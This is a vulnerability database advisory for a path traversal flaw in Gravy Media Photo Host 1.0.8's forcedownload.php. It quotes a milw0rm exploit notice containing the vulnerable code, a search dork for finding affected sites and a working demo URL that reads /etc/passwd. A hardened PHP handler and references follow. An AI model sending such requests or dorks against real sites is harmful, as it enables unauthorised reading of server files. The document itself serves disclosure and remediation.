Gravy Media Photo Host forcedownload.php Path Traversal Vulnerability

Vulnerability ID: 1117997    Vulnerability type: Path traversal
Published: 2009-06-22    Updated: 2009-06-22
CVE: CVE-2009-2184    CNNVD-ID: CNNVD-200906-383
Platform: PHP    CVSS score: 5.0
|Vulnerability sources
https://www.exploit-db.com/exploits/8996
https://www.securityfocus.com/bid/43878
https://cxsecurity.com/issue/WLB-2009060180
http://www.cnnvd.org.cn/web/xxk/ldxqById.tag?CNNVD=CNNVD-200906-383
|Vulnerability details
Gravy Media Photo Host 1.0.8 contains an absolute path traversal vulnerability in forcedownload.php. A remote attacker can read arbitrary files by supplying an encoded "/" in the file parameter.
|Vulnerability EXP
==================================================================
=========Gravy Media Photo Host 1.0.8 Local File Inclusion========
==================================================================

Vendor: http://www.gravy-media.com/
Download: register to download
Dork: "Powered by Gravy Media"
Discovered By: Lo$er

====Vulnerable code (forcedownload.php)====
27. $filename = $_GET['file'];

70. readfile("$filename");
====Demo====

http://www.gravy-media.com/v108/forcedownload.php?file=%2Fetc%2Fpasswd

# milw0rm.com [2009-06-22]
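The two lines quoted above pass the decoded `file` parameter straight to `readfile()`. As an added example, not part of the advisory or of Gravy Media's code, the following is a hardened replacement for that handler; it assumes the downloadable photos live in a single directory, `PHOTO_DIR` (a hypothetical path), and it only serves files by bare name after a canonical containment check.

```php
<?php
// Added example, not Gravy Media's code: a hardened download handler.
// Assumption: files to serve live only in PHOTO_DIR (hypothetical path).
const PHOTO_DIR = __DIR__ . '/photos';

/**
 * Return the canonical path of the requested file only if it lies inside
 * PHOTO_DIR; return null for traversal, absolute paths, symlink escapes
 * and missing files.
 */
function resolve_download(string $requested): ?string
{
    // PHP has already URL-decoded $_GET, so "%2Fetc%2Fpasswd" arrives as
    // "/etc/passwd": validate the decoded value, never the raw query.
    if ($requested === '' || strpos($requested, "\0") !== false) {
        return null;
    }
    // The handler only serves files by bare name, so any directory
    // component (including a leading "/") is rejected outright.
    if ($requested !== basename($requested)) {
        return null;
    }
    $base = realpath(PHOTO_DIR);
    $path = realpath(PHOTO_DIR . DIRECTORY_SEPARATOR . $requested);
    if ($base === false || $path === false) {
        return null;
    }
    // Containment check on canonical paths: catches symlinks that point
    // outside the store, and the trailing separator stops a sibling such
    // as "photos_private" from matching the prefix.
    $prefix = $base . DIRECTORY_SEPARATOR;
    if (strncmp($path, $prefix, strlen($prefix)) !== 0 || !is_file($path)) {
        return null;
    }
    return $path;
}

$raw = $_GET['file'] ?? '';
$path = resolve_download(is_string($raw) ? $raw : '');
if ($path === null) {
    http_response_code(404);
    exit('File not found');
}
header('Content-Type: application/octet-stream');
header("Content-Disposition: attachment; filename*=UTF-8''" . rawurlencode(basename($path)));
header('Content-Length: ' . filesize($path));
readfile($path);
```

The `basename()` check alone already stops the encoded-"/" case from the advisory; the `realpath()` prefix comparison is kept as defence in depth against symlinks inside the store.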
|Affected products
Gravy Media Gravy Media's Photo Host 1.0.8
|References

Source: XF
Name: gravy-file-file-download (51299)
Link: http://xforce.iss.net/xforce/xfdb/51299
Source: VUPEN
Name: ADV-2009-1651
Link: http://www.vupen.com/english/advisories/2009/1651
Source: MILW0RM
Name: 8996
Link: http://www.milw0rm.com/exploits/8996
Source: SECUNIA
Name: 35518
Link: http://secunia.com/advisories/35518
Source: OSVDB
Name: 55280
Link: http://osvdb.org/55280